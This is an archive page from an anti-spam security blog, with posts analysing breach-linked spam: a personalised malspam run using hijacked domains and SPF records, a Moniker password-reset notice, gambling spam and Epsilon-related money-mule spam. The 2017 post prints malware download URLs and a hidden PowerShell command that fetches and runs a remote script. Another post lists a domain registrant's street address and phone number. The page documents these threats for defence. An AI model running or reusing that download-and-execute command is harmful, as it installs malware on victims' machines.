Sponsored by..

Showing posts with label Data Breach. Show all posts
Showing posts with label Data Breach. Show all posts

Wednesday 15 February 2017

Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation

Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery

Your Order Information
Prices include VAT at 20%

Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!



Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [ - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - and which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on through But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address)
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4: ip4: ip4: ip4: ip4: ip4:  ~all
So.. the SPF records are valid for sending servers in the through range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)

Recommended blocklist (web)

Thursday 20 June 2013

Moniker "Security Notice: Service-wide Password Reset" mail and t.lt02.net

This email from Moniker shows an impressive combination of WIN and FAIL at the same time.



Moniker’s Operations & Security team has discovered and blocked suspicious activity on the Moniker network that appears to have been a coordinated attempt to access a number of Moniker user accounts.

As a precaution to protect your domains, we have decided to implement a system-wide password reset. Please read the below instructions to create a new password. You will not be able to access your Moniker account until these steps are taken.

In our security investigation, we have found no evidence that domains have been lost or transferred out. We also have no evidence that any confidential or credit card information has been compromised.

While our password encryption measures are robust, we are taking additional steps to ensure that your personal data and domains remain secure. This means that, to be absolutely sure of the security of your account, we are requiring all users to reset their Moniker account passwords.
Please reset your password by following the directions below.

1) Go to Moniker.com and click the “Sign In” button in the upper right hand corner of the home page. Select the “Forgot Your Password” link.

2) You will be directed to a page to “Retrieve” your Moniker Account Password. When prompted, enter your account number and click “Submit”.

3) You will be directed to a page that displays the message below. You will receive an email from Moniker. Please follow the instructions in this email to complete the password reset.

As recent events with other large services have demonstrated, this type of activity is becoming more common. We take our responsibility to keep your domains and personal data safe very seriously, and we're constantly enhancing the security of our service infrastructure to protect our customers. We feel it is also important to be clear that we view this as attempted illegal activity and have taken steps to report this to the appropriate authorities.

There are also several important steps that you can take to ensure that your data on any website, including Moniker, is secure:
•    Avoid using simple passwords based on dictionary words
•    Never use the same password on multiple sites or services
•    Never click on 'reset password' requests in emails that you did not request

Thank you for taking the time to read this email. We sincerely apologize for the inconvenience of having to change your password, but, ultimately, we believe this simple step will result in a more secure experience. If you have any questions, please do not hesitate to contact Moniker Support. Our support team is standing by to assist at 800-688-6311 or outside the U.S. and Canada: 954-607-1294.

Drake Harvey
Chief Operations Officer

1800 SW 1st Ave, Suite 440, Portland, OR, USA
Sales and Support: +1 (800) 688-6311
Copyright © 2013 Moniker.com | SnapNames. 

Full disclosure and prompt action is a WIN. Shit happens, it's often how you deal with it that makes the difference. But wait.. where does the link in the email go to? t.lt02.net? Who the heck are they? And this is where a big dose of FAIL happens.

lt02.net belongs to a company called VertexInternet (vertex.net). This company is not related to Moniker, and bearing in mind that this email is about a potential security breach you might expect people to be a little bit cautious about clicking through those links.

To be fair, the body of the email does suggest going to "moniker.com" (i.e. typing it in the address bar). The mystery of lt02.net is easily explainable too.. VertexInternet run an email marketing system called Listrak which is what is being used to send out the email. The email is legitimate, and presumably it has been done this way for reasons of speed.. the problem is that many people will probably be highly suspicious of this email given the context and that this approach is often used by the Bad Guys.

If you are going to send out a message like this, make sure that all the links go to a site that the recipient would recognise. In this case the sensible option would be to link directly to moniker.com. I'm betting that quite a few people will ignore this message and then wonder why they cannot log into their accounts at a later date.

Wednesday 30 January 2013

Intelius spam (or is it a data breach?)

This spam was sent to an email address only used for register for intelius.com. Either there has been a data breach at Intelius, or they have decided to go into the gambling business.

From:     Grand Palace Slots [no-reply@tsm-forum.net]
Date:     30 January 2013 10:39
Subject:     Try to play slots - 10$ free
Mailed-By:     tsm-forum.net

Feel the unique excitement of playing at the world's premiere games!

Grand Palace gives you welcome package for slots up to 8,000$! What a fantastic offer, straight from the heart of World's gaming leader!

This is a great offer, especially when you see what else Grand Palace has to offer:

- US players welcome
- more than 100 fun games, realistic graphics
- the most secure and up-to-date software
- professional support staff to help you with whatever you might need, any time of the day or night!

And in the end we want to give you 10$ absolutelly free! (Use code CASH10)

Hurry up! Your free Grand Palace cash is waiting! Play Today!


Click here to opt out of this email:

The originating IP is (Telecom Italia, Italy), spamvertised site is www.igrandpalacegold.com on (Fajncom SRO, Czech Republic) and is registered to:

    Klemens Chmielewski
    Klemens Chmielewski        (calder@igrandpalacegold.com)
    ul. Czerniowiecka 78
    Tel. +48.722514299

I'm assuming that Intelius doesn't want to promote what would be illegal gambling for US citizens, which really leads just one other option..

Wednesday 20 July 2011

Epsilon Breach Spam Run

The Epsilon Data Breach from a few months back certainly made headlines, but I haven't seen much in the way of spam activity that I could directly attribute to it. Until now.

From: Olga Sunday [mailto:SundayqyOhilga@hotmail.com]
Sent: 18 July 2011 17:31
To: Spam Victim
Subject: Spam Victim

Don't miss unique employment opportunity.
The company is seeking for enthusiastic representative in United Kingdom to help us spread out our activity in the Europe area.
easy training available.
Superb income potential.

- 18+ age
- Only basic knowledge of Internet & computer.
- 2-3 free hours per day

Candidates must be smart and commerce motivated. Operate only few hours per day.
Everyone located in the United Kingdom can become our representative.
Thank you for your attention.

Current News : honor rolls for monday, july , . 

At first glance it looks like a standard money mule spam, but there are two odd things. One is the "Subject" line which has the actual name of the spam victim. Not their email address, their real name.. more of this in a minute. The other odd thing is that the "From" address appears to be valid, and the email really has originated from Hotmail, presumably in some sort of auto-generated spamming account.

The inclusion of the recipient's name in the subject is the odd thing. In this case, I had a bunch of largely unrelated users in different countries with very similar email messages. So where had the names come from? Well, there were a couple of anomalies which gave a clue.. in two cases the "Subject" name was a family member, and not the actual recipient.

This narrowed down the possibilities, and it became apparent that the users had registered for something in the name of a family member, but using their own email account. And in one case that tied directly to a company which was a victim of the Epsilon data breach.

Looking over the other spam recipients, the majority were on the mailing list of Hilton Honors, Marriott Rewards, Marks and Spencer, Capital One or other Epsilon customers. Some didn't fit the pattern, but were connected with Pixmania, Plentyoffish.com and Play.com which were all hacked at about the same time. So perhaps the spammer's list is made up of data from more than one source.

Do I know for sure that this is connected with the Epsilon breach? No. But the inclusion of the family member's names indicates that they were harvested externally, the majority of users could be shown to have a connection to companies involved in the Epsilon breach, and the small number who couldn't seemed to be users of other breached companies.

This spam was very crude in its actual pitch. But I'm guessing that this will be the first of many more targeted spam/scam emails using this stolen data.